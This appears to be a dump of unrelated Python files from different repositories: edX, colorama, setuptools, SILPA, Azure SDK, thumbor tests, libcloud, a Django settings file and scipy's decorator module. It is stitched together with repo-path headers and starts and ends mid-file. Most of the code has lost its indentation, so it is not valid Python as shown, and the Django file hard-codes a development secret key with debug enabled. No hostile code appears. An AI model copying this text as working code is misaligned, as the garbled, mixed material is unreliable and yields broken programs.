for packet in packets:
self.log.debug("recv packet %s len=%i" % (conn_id, len(packet)))
self.on_packet_recv(conn_id, packet)
###########################################################
def _on_ready_to_send(self, conn_id, sent_length):
conn = self._connections[conn_id]
conn.send_in_progress = False
conn.send_buffer.cut(sent_length)
while sent_length > 0:
first, packet_id = conn.queued_packet_ids.popleft()
if first <= sent_length:
self.on_packet_sent(conn_id, packet_id)
else:
conn.queued_packet_ids.appendleft((first - sent_length,
packet_id))
sent_length -= first
self._send_to_link(conn_id, conn)
###########################################################
def _send_to_link(self, conn_id, conn):
if conn.send_in_progress:
return
buf = conn.send_buffer.get(SEND_BLOCK_SIZE, False)
if buf:
self.link.send(conn_id, buf)
conn.send_in_progress = True
|
ak2703/edx-platform | refs/heads/master | common/lib/xmodule/xmodule/errortracker.py | 177 | import logging
import sys
import traceback
from collections import namedtuple
log = logging.getLogger(__name__)
ErrorLog = namedtuple('ErrorLog', 'tracker errors')
def exc_info_to_str(exc_info):
"""Given some exception info, convert it into a string using
the traceback.format_exception() function.
"""
return ''.join(traceback.format_exception(*exc_info))
def in_exception_handler():
'''Is there an active exception?'''
return sys.exc_info() != (None, None, None)
def make_error_tracker():
'''Return an ErrorLog (named tuple), with fields (tracker, errors), where
the logger appends a tuple (message, exception_str) to the errors on every
call. exception_str is in the format returned by traceback.format_exception.
error_list is a simple list. If the caller modifies it, info
will be lost.
'''
errors = []
def error_tracker(msg):
'''Log errors'''
exc_str = ''
if in_exception_handler():
exc_str = exc_info_to_str(sys.exc_info())
# don't display irrelevant gunicorn sync error
if (('python2.7/site-packages/gunicorn/workers/sync.py' in exc_str) and
('[Errno 11] Resource temporarily unavailable' in exc_str)):
exc_str = ''
errors.append((msg, exc_str))
return ErrorLog(error_tracker, errors)
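# Usage sketch:
#   errorlog = make_error_tracker()
#   try:
#       1 / 0
#   except ZeroDivisionError:
#       errorlog.tracker("division failed")
#   # errorlog.errors == [("division failed", "<formatted traceback>")]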
def null_error_tracker(msg):
'''A dummy error tracker that just ignores the messages'''
pass
|
mpercich/Calendarize | refs/heads/master | ios/dateparser/lib/python2.7/site-packages/pip/_vendor/colorama/win32.py | 535 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
# from winbase.h
STDOUT = -11
STDERR = -12
try:
import ctypes
from ctypes import LibraryLoader
windll = LibraryLoader(ctypes.WinDLL)
from ctypes import wintypes
except (AttributeError, ImportError):
windll = None
SetConsoleTextAttribute = lambda *_: None
winapi_test = lambda *_: None
else:
from ctypes import byref, Structure, c_char, POINTER
COORD = wintypes._COORD
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
"""struct in wincon.h."""
_fields_ = [
("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", wintypes.WORD),
("srWindow", wintypes.SMALL_RECT),
("dwMaximumWindowSize", COORD),
]
def __str__(self):
return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (
self.dwSize.Y, self.dwSize.X
, self.dwCursorPosition.Y, self.dwCursorPosition.X
, self.wAttributes
, self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
)
_GetStdHandle = windll.kernel32.GetStdHandle
_GetStdHandle.argtypes = [
wintypes.DWORD,
]
_GetStdHandle.restype = wintypes.HANDLE
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
_GetConsoleScreenBufferInfo.argtypes = [
wintypes.HANDLE,
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
]
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
_SetConsoleTextAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
]
_SetConsoleTextAttribute.restype = wintypes.BOOL
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
_SetConsoleCursorPosition.argtypes = [
wintypes.HANDLE,
COORD,
]
_SetConsoleCursorPosition.restype = wintypes.BOOL
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
_FillConsoleOutputCharacterA.argtypes = [
wintypes.HANDLE,
c_char,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
_FillConsoleOutputAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputAttribute.restype = wintypes.BOOL
    _SetConsoleTitleA = windll.kernel32.SetConsoleTitleA
    _SetConsoleTitleA.argtypes = [
        wintypes.LPCSTR
    ]
    _SetConsoleTitleA.restype = wintypes.BOOL
handles = {
STDOUT: _GetStdHandle(STDOUT),
STDERR: _GetStdHandle(STDERR),
}
def winapi_test():
handle = handles[STDOUT]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return bool(success)
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
handle = handles[stream_id]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return csbi
def SetConsoleTextAttribute(stream_id, attrs):
handle = handles[stream_id]
return _SetConsoleTextAttribute(handle, attrs)
def SetConsoleCursorPosition(stream_id, position, adjust=True):
position = COORD(*position)
# If the position is out of range, do nothing.
if position.Y <= 0 or position.X <= 0:
return
# Adjust for Windows' SetConsoleCursorPosition:
# 1. being 0-based, while ANSI is 1-based.
# 2. expecting (x,y), while ANSI uses (y,x).
adjusted_position = COORD(position.Y - 1, position.X - 1)
if adjust:
# Adjust for viewport's scroll position
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
adjusted_position.Y += sr.Top
adjusted_position.X += sr.Left
# Resume normal processing
handle = handles[stream_id]
return _SetConsoleCursorPosition(handle, adjusted_position)
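    # Example: an ANSI "CUP 3;5" request reaches this function as
    # position (3, 5); after the 1-based (y, x) -> 0-based (x, y)
    # adjustment the API receives COORD(X=4, Y=2), shifted by the
    # visible window's scroll offset when adjust=True.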
def FillConsoleOutputCharacter(stream_id, char, length, start):
handle = handles[stream_id]
char = c_char(char.encode())
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
success = _FillConsoleOutputCharacterA(
handle, char, length, start, byref(num_written))
return num_written.value
def FillConsoleOutputAttribute(stream_id, attr, length, start):
''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
handle = handles[stream_id]
attribute = wintypes.WORD(attr)
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
return _FillConsoleOutputAttribute(
handle, attribute, length, start, byref(num_written))
def SetConsoleTitle(title):
        return _SetConsoleTitleA(title)
|
axbaretto/beam | refs/heads/master | sdks/python/.tox/docs/lib/python2.7/site-packages/setuptools/py36compat.py | 313 | import sys
from distutils.errors import DistutilsOptionError
from distutils.util import strtobool
from distutils.debug import DEBUG
class Distribution_parse_config_files:
"""
Mix-in providing forward-compatibility for functionality to be
included by default on Python 3.7.
Do not edit the code in this class except to update functionality
as implemented in distutils.
"""
def parse_config_files(self, filenames=None):
from configparser import ConfigParser
# Ignore install directory options if we have a venv
if sys.prefix != sys.base_prefix:
ignore_options = [
'install-base', 'install-platbase', 'install-lib',
'install-platlib', 'install-purelib', 'install-headers',
'install-scripts', 'install-data', 'prefix', 'exec-prefix',
'home', 'user', 'root']
else:
ignore_options = []
ignore_options = frozenset(ignore_options)
if filenames is None:
filenames = self.find_config_files()
if DEBUG:
self.announce("Distribution.parse_config_files():")
parser = ConfigParser(interpolation=None)
for filename in filenames:
if DEBUG:
self.announce(" reading %s" % filename)
parser.read(filename)
for section in parser.sections():
options = parser.options(section)
opt_dict = self.get_option_dict(section)
for opt in options:
if opt != '__name__' and opt not in ignore_options:
                    val = parser.get(section, opt)
opt = opt.replace('-', '_')
opt_dict[opt] = (filename, val)
# Make the ConfigParser forget everything (so we retain
# the original filenames that options come from)
parser.__init__()
# If there was a "global" section in the config file, use it
# to set Distribution options.
if 'global' in self.command_options:
for (opt, (src, val)) in self.command_options['global'].items():
alias = self.negative_opt.get(opt)
try:
if alias:
setattr(self, alias, not strtobool(val))
elif opt in ('verbose', 'dry_run'): # ugh!
setattr(self, opt, strtobool(val))
else:
setattr(self, opt, val)
except ValueError as msg:
raise DistutilsOptionError(msg)
if sys.version_info < (3,):
# Python 2 behavior is sufficient
class Distribution_parse_config_files:
pass
if False:
# When updated behavior is available upstream,
# disable override here.
class Distribution_parse_config_files:
pass
|
BT-fgarbely/partner-contact | refs/heads/8.0 | partner_helper/__init__.py | 35 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Sébastien BEAU <sebastien.beau@akretion.com>
# Copyright 2014 Akretion
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import partner # noqa
|
santhoshtr/silpa | refs/heads/master | src/silpa/modules/fortune/fortune.py | 3 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Fortune program
# Copyright 2008 Santhosh Thottingal <santhosh.thottingal@gmail.com>
# http://www.smc.org.in
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# If you find any bugs or have any suggestions email: santhosh.thottingal@gmail.com
import os, random
import codecs
from common import *
class Fortune(SilpaModule):
def __init__(self):
        self.template = os.path.join(os.path.dirname(__file__), 'fortune.html')
self.response = SilpaResponse(self.template)
def fortunes(self, infile, pattern=None):
""" Yield fortunes as lists of lines """
quotes = []
results = []
quote = ''
for line in infile:
#line = unicode(line)
if line == "%\n":
quotes.append(quote)
quote = ''
else:
quote += line
if pattern:
for quote in quotes:
if quote.find(pattern) >= 0:
results.append(quote)
return results
return quotes
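    # The .dic databases follow the classic fortune(6) layout, quotes
    # separated by a line holding a single "%", e.g. (made-up content):
    #
    #   First quote, possibly
    #   spanning several lines.
    #   %
    #   Second quote.
    #   %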
@ServiceMethod
    def fortune(self, database, pattern=None):
        """ Pick a random fortune from a file """
        filename = os.path.join(os.path.dirname(__file__), 'database', database + ".dic")
        fortunes_file = codecs.open(filename, encoding='utf-8', errors='ignore')
        fortunes_list = self.fortunes(fortunes_file, pattern)
chosen = ""
if fortunes_list:
chosen = random.choice(fortunes_list)
return "".join(chosen)
def get_module_name(self):
return "Fortune Cookies"
def get_info(self):
return "Get/Search a random quote "
def getInstance():
return Fortune()
|
AutorestCI/azure-sdk-for-python | refs/heads/master | azure-mgmt-containerinstance/azure/mgmt/containerinstance/models/container_instance_management_client_enums.py | 2 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ContainerNetworkProtocol(Enum):
tcp = "TCP"
udp = "UDP"
class ContainerGroupRestartPolicy(Enum):
always = "Always"
on_failure = "OnFailure"
never = "Never"
class ContainerGroupNetworkProtocol(Enum):
tcp = "TCP"
udp = "UDP"
class OperatingSystemTypes(Enum):
windows = "Windows"
linux = "Linux"
class ContainerInstanceOperationsOrigin(Enum):
user = "User"
system = "System"
|
adeboisanger/thumbor | refs/heads/master | tests/test_url.py | 4 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
from unittest import TestCase
from preggy import expect
from thumbor.url import Url
class UrlTestCase(TestCase):
def setUp(self):
Url.compiled_regex = None
def test_can_get_regex(self):
regex = Url.regex()
expect(regex).to_equal(
'/?(?:(?:(?P<unsafe>unsafe)|(?P<hash>.+?))/)?(?:(?P<debug>debug)/)?(?:(?P<meta>meta)/)?'
'(?:(?P<trim>trim(?::(?:top-left|bottom-right))?(?::\\d+)?)/)?'
'(?:(?P<crop_left>\\d+)x(?P<crop_top>\\d+):(?P<crop_right>\\d+)x(?P<crop_bottom>\\d+)/)?'
'(?:(?P<adaptive>adaptive-)?(?P<full>full-)?(?P<fit_in>fit-in)/)?(?:(?P<horizontal_flip>-)?'
'(?P<width>(?:\\d+|orig))?x(?P<vertical_flip>-)?(?P<height>(?:\\d+|orig))?/)?'
'(?:(?P<halign>left|right|center)/)?(?:(?P<valign>top|bottom|middle)/)?'
'(?:(?P<smart>smart)/)?(?:filters:(?P<filters>.+?\\))/)?(?P<image>.+)'
)
def test_can_get_regex_without_unsafe(self):
regex = Url.regex(False)
expect(regex).to_equal(
'/?(?:(?P<debug>debug)/)?(?:(?P<meta>meta)/)?'
'(?:(?P<trim>trim(?::(?:top-left|bottom-right))?(?::\\d+)?)/)?'
'(?:(?P<crop_left>\\d+)x(?P<crop_top>\\d+):(?P<crop_right>\\d+)x(?P<crop_bottom>\\d+)/)?'
'(?:(?P<adaptive>adaptive-)?(?P<full>full-)?(?P<fit_in>fit-in)/)?(?:(?P<horizontal_flip>-)?'
'(?P<width>(?:\\d+|orig))?x(?P<vertical_flip>-)?(?P<height>(?:\\d+|orig))?/)?'
'(?:(?P<halign>left|right|center)/)?(?:(?P<valign>top|bottom|middle)/)?'
'(?:(?P<smart>smart)/)?(?:filters:(?P<filters>.+?\\))/)?(?P<image>.+)'
)
def test_parsing_invalid_url(self):
expect(Url.compiled_regex).to_be_null()
url = ""
expect(Url.parse_decrypted(url)).to_be_null()
def test_parsing_complete_url(self):
url = '/debug/meta/trim/300x200:400x500/adaptive-full-fit-in/-300x-400/' \
'left/top/smart/filters:brightness(100)/some/image.jpg'
expected = {
'trim': 'trim',
'full': True,
'halign': 'left',
'fit_in': True,
'vertical_flip': True,
'image': 'some/image.jpg',
'crop': {'top': 200, 'right': 400, 'bottom': 500, 'left': 300},
'height': 400,
'width': 300,
'meta': True,
'horizontal_flip': True,
'filters': 'brightness(100)',
'valign': 'top',
'debug': True,
'adaptive': True,
'smart': True,
}
result = Url.parse_decrypted(url)
expect(result).not_to_be_null()
expect(result).to_be_like(expected)
# do it again to use compiled regex
result = Url.parse_decrypted(url)
expect(result).not_to_be_null()
expect(result).to_be_like(expected)
def test_can_generate_url(self):
url = Url.generate_options(
debug=True,
width=300,
height=200,
smart=True,
meta=True,
trim=True,
adaptive=True,
full=True,
fit_in=True,
horizontal_flip=True,
vertical_flip=True,
halign='left',
valign='top',
crop_left=100,
crop_top=100,
crop_right=400,
crop_bottom=400,
filters='brightness(100)'
)
expect(url).to_equal(
'debug/meta/trim/100x100:400x400/adaptive-full-fit-in/-300x-200/left/top/smart/filters:brightness(100)'
)
def test_can_generate_url_with_defaults(self):
url = Url.generate_options()
expect(url).to_be_empty()
def test_can_generate_url_with_fitin(self):
url = Url.generate_options(fit_in=True, adaptive=False, full=False)
expect(url).to_equal('fit-in')
def test_can_generate_url_with_custom_trim(self):
url = Url.generate_options(
debug=True,
width=300,
height=200,
smart=True,
meta=True,
trim='300x200',
adaptive=True,
full=True,
fit_in=True,
horizontal_flip=True,
vertical_flip=True,
halign='left',
valign='top',
crop_left=100,
crop_top=100,
crop_right=400,
crop_bottom=400,
filters='brightness(100)'
)
expect(url).to_equal(
'debug/meta/trim:300x200/100x100:400x400/adaptive-full-fit-in/-300x-200/left/top/smart/filters:brightness(100)'
)
def test_can_encode_url(self):
url = '/tes+ t:?%=&()~",\'$'
expect(Url.encode_url(url)).to_equal('/tes%2B%20t:?%=&()~",\'$')
|
samuelchong/libcloud | refs/heads/trunk | docs/examples/compute/ecs/ex_list_security_groups.py | 29 | import pprint
from libcloud.compute.providers import get_driver
from libcloud.compute.types import Provider
ECSDriver = get_driver(Provider.ALIYUN_ECS)
region = 'cn-hangzhou'
access_key_id = 'CHANGE IT'
access_key_secret = 'CHANGE IT'
driver = ECSDriver(access_key_id, access_key_secret, region=region)
sec_groups = driver.ex_list_security_groups()
pprint.pprint(sec_groups)
|
bioinformatics-ua/montra | refs/heads/master | emif/questionnaire/admin.py | 2 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Universidade de Aveiro, DETI/IEETA, Bioinformatics Group - http://bioinformatics.ua.pt/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from models import *
from django.utils.safestring import mark_safe
class ChoiceAdmin(admin.ModelAdmin):
list_display = ['sortid', 'text', 'value', 'question']
class ChoiceInline(admin.TabularInline):
ordering = ['sortid']
model = Choice
extra = 5
def markall_ignoremlt(modeladmin, request, queryset):
for qset in queryset:
for question in qset.questions():
question.mlt_ignore = True
question.save()
markall_ignoremlt.short_description = "Mark all questions has ignored from MLT"
def markall_noignoremlt(modeladmin, request, queryset):
for qset in queryset:
for question in qset.questions():
question.mlt_ignore = False
question.save()
markall_noignoremlt.short_description = "Mark all questions has not ignored from MLT"
class QuestionSetAdmin(admin.ModelAdmin):
#ordering = ['questionnaire', 'sortid', ]
list_filter = ['questionnaire', ]
list_display = ['questionnaire', 'heading', 'sortid', ]
list_editable = ['sortid', ]
actions = [markall_ignoremlt, markall_noignoremlt]
class QuestionAdmin(admin.ModelAdmin):
ordering = ['questionset__questionnaire', 'questionset', 'number']
inlines = [ChoiceInline]
def changelist_view(self, request, extra_context=None):
"Hack to have Questionnaire list accessible for custom changelist template"
if not extra_context:
extra_context = {}
extra_context['questionnaires'] = Questionnaire.objects.all().order_by('name')
return super(QuestionAdmin, self).changelist_view(request, extra_context)
def clone_questionnaires(modeladmin, request, queryset):
for query in queryset:
query.copy()
clone_questionnaires.short_description = "Clone selected questionnaires"
class QuestionnaireAdmin(admin.ModelAdmin):
actions = [clone_questionnaires]
class QuestionnaireWizardAdmin(admin.ModelAdmin):
list_display = ['questionnaire', 'user', 'removed']
admin.site.register(Questionnaire, QuestionnaireAdmin)
admin.site.register(Question, QuestionAdmin)
admin.site.register(QuestionSet, QuestionSetAdmin)
admin.site.register(QuestionnaireWizard, QuestionnaireWizardAdmin)
|
MariusLauge/dnd_tracker | refs/heads/master | dnd_tracker/settings.py | 1 | """
Django settings for dnd_tracker project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'juchgjo=*=80&i=5xw18eg0-43h&wjms1wvi4j2u#8_uq0&1kc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'frag_tracker.apps.FragTrackerConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dnd_tracker.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['./templates',],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dnd_tracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Copenhagen'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/characterlistview' |
endolith/scipy | refs/heads/master | scipy/_lib/decorator.py | 12 | # ######################### LICENSE ############################ #
# Copyright (c) 2005-2015, Michele Simionato
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in bytecode form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
"""
Decorator module, see https://pypi.python.org/pypi/decorator
for the documentation.
"""
import re
import sys
import inspect
import operator
import itertools
import collections
from inspect import getfullargspec
__version__ = '4.0.5'
def get_init(cls):
return cls.__init__
# getargspec has been deprecated in Python 3.5
ArgSpec = collections.namedtuple(
'ArgSpec', 'args varargs varkw defaults')
def getargspec(f):
"""A replacement for inspect.getargspec"""
spec = getfullargspec(f)
return ArgSpec(spec.args, spec.varargs, spec.varkw, spec.defaults)
DEF = re.compile(r'\s*def\s*([_\w][_\w\d]*)\s*\(')
# basic functionality
class FunctionMaker:
"""
An object with the ability to create functions with a given signature.
It has attributes name, doc, module, signature, defaults, dict, and
methods update and make.
"""
# Atomic get-and-increment provided by the GIL
_compile_count = itertools.count()
def __init__(self, func=None, name=None, signature=None,
defaults=None, doc=None, module=None, funcdict=None):
self.shortsignature = signature
if func:
# func can be a class or a callable, but not an instance method
self.name = func.__name__
if self.name == '<lambda>': # small hack for lambda functions
self.name = '_lambda_'
self.doc = func.__doc__
self.module = func.__module__
if inspect.isfunction(func):
argspec = getfullargspec(func)
self.annotations = getattr(func, '__annotations__', {})
for a in ('args', 'varargs', 'varkw', 'defaults', 'kwonlyargs',
'kwonlydefaults'):
setattr(self, a, getattr(argspec, a))
for i, arg in enumerate(self.args):
setattr(self, 'arg%d' % i, arg)
allargs = list(self.args)
allshortargs = list(self.args)
if self.varargs:
allargs.append('*' + self.varargs)
allshortargs.append('*' + self.varargs)
elif self.kwonlyargs:
allargs.append('*') # single star syntax
for a in self.kwonlyargs:
allargs.append('%s=None' % a)
allshortargs.append('%s=%s' % (a, a))
if self.varkw:
allargs.append('**' + self.varkw)
allshortargs.append('**' + self.varkw)
self.signature = ', '.join(allargs)
self.shortsignature = ', '.join(allshortargs)
self.dict = func.__dict__.copy()
# func=None happens when decorating a caller
if name:
self.name = name
if signature is not None:
self.signature = signature
if defaults:
self.defaults = defaults
if doc:
self.doc = doc
if module:
self.module = module
if funcdict:
self.dict = funcdict
        # check existence of required attributes
assert hasattr(self, 'name')
if not hasattr(self, 'signature'):
raise TypeError('You are decorating a non-function: %s' % func)
def update(self, func, **kw):
"Update the signature of func with the data in self"
func.__name__ = self.name
func.__doc__ = getattr(self, 'doc', None)
func.__dict__ = getattr(self, 'dict', {})
func.__defaults__ = getattr(self, 'defaults', ())
func.__kwdefaults__ = getattr(self, 'kwonlydefaults', None)
func.__annotations__ = getattr(self, 'annotations', None)
try:
frame = sys._getframe(3)
except AttributeError: # for IronPython and similar implementations
callermodule = '?'
else:
callermodule = frame.f_globals.get('__name__', '?')
func.__module__ = getattr(self, 'module', callermodule)
func.__dict__.update(kw)
def make(self, src_templ, evaldict=None, addsource=False, **attrs):
"Make a new function from a given template and update the signature"
src = src_templ % vars(self) # expand name and signature
evaldict = evaldict or {}
mo = DEF.match(src)
if mo is None:
raise SyntaxError('not a valid function template\n%s' % src)
name = mo.group(1) # extract the function name
names = set([name] + [arg.strip(' *') for arg in
self.shortsignature.split(',')])
for n in names:
if n in ('_func_', '_call_'):
raise NameError('%s is overridden in\n%s' % (n, src))
if not src.endswith('\n'): # add a newline just for safety
src += '\n' # this is needed in old versions of Python
# Ensure each generated function has a unique filename for profilers
# (such as cProfile) that depend on the tuple of (<filename>,
# <definition line>, <function name>) being unique.
filename = '<decorator-gen-%d>' % (next(self._compile_count),)
try:
code = compile(src, filename, 'single')
exec(code, evaldict)
except: # noqa: E722
print('Error in generated code:', file=sys.stderr)
print(src, file=sys.stderr)
raise
func = evaldict[name]
if addsource:
attrs['__source__'] = src
self.update(func, **attrs)
return func
@classmethod
def create(cls, obj, body, evaldict, defaults=None,
doc=None, module=None, addsource=True, **attrs):
"""
Create a function from the strings name, signature, and body.
evaldict is the evaluation dictionary. If addsource is true, an
attribute __source__ is added to the result. The attributes attrs
are added, if any.
"""
if isinstance(obj, str): # "name(signature)"
name, rest = obj.strip().split('(', 1)
signature = rest[:-1] # strip a right parens
func = None
else: # a function
name = None
signature = None
func = obj
self = cls(func, name, signature, defaults, doc, module)
ibody = '\n'.join(' ' + line for line in body.splitlines())
return self.make('def %(name)s(%(signature)s):\n' + ibody,
evaldict, addsource, **attrs)
def decorate(func, caller):
"""
decorate(func, caller) decorates a function using a caller.
"""
evaldict = func.__globals__.copy()
evaldict['_call_'] = caller
evaldict['_func_'] = func
fun = FunctionMaker.create(
func, "return _call_(_func_, %(shortsignature)s)",
evaldict, __wrapped__=func)
if hasattr(func, '__qualname__'):
fun.__qualname__ = func.__qualname__
return fun
def decorator(caller, _func=None):
"""decorator(caller) converts a caller function into a decorator"""
if _func is not None: # return a decorated function
# this is obsolete behavior; you should use decorate instead
return decorate(_func, caller)
# else return a decorator function
if inspect.isclass(caller):
name = caller.__name__.lower()
callerfunc = get_init(caller)
doc = 'decorator(%s) converts functions/generators into ' \
'factories of %s objects' % (caller.__name__, caller.__name__)
elif inspect.isfunction(caller):
if caller.__name__ == '<lambda>':
name = '_lambda_'
else:
name = caller.__name__
callerfunc = caller
doc = caller.__doc__
else: # assume caller is an object with a __call__ method
name = caller.__class__.__name__.lower()
callerfunc = caller.__call__.__func__
doc = caller.__call__.__doc__
evaldict = callerfunc.__globals__.copy()
evaldict['_call_'] = caller
evaldict['_decorate_'] = decorate
return FunctionMaker.create(
'%s(func)' % name, 'return _decorate_(func, _call_)',
evaldict, doc=doc, module=caller.__module__,
__wrapped__=caller)
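# Usage sketch (illustrative, mirroring the decorator package documentation):
#
#     @decorator
#     def trace(f, *args, **kw):
#         print('calling %s with args %s, %s' % (f.__name__, args, kw))
#         return f(*args, **kw)
#
#     @trace
#     def add(x, y):
#         return x + y
#
# add(1, 2) prints the trace line and returns 3, and because the wrapper is
# generated from the original signature, inspect.getfullargspec(add) still
# reports ('x', 'y').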
# ####################### contextmanager ####################### #
try: # Python >= 3.2
